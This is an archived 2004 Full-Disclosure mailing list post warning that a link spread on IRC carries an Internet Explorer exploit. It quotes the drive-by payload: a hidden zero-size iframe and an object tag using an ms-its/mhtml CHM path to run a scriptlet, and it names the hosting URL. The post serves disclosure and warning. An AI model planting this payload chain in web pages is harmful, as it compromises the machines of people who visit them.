lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <40719CD5.8060609@home.nl>
From: niekbaakman at home.nl (Niek Baakman)
Subject: IE exploit going around on irc

Hi list,

this thing's been going around on irc the last few days:

www.divx.dc-hub.com (IE users don't click it!)
check source:
<iframe src='loi.htm' width=0 height=0></iframe>

loi.htm contains:
    <object
    data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
    type="text/x-scriptlet"></object>


LOI.CHM is attached

Regards,

Niek Baakman

-- 

The greatest trick the devil ever pulled was convincing the world he didn't exist.
PGP KeyID: 0x65C28B9A   |    Fingerprint: 7A5301026E58CF3FACE7F2F0D82B854565C28B9A

-------------- next part --------------
A non-text attachment was scrubbed...
Name: LOI.zip
Type: application/octet-stream
Size: 6422 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040405/7a2072af/LOI.obj
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 187 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040405/7a2072af/signature.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ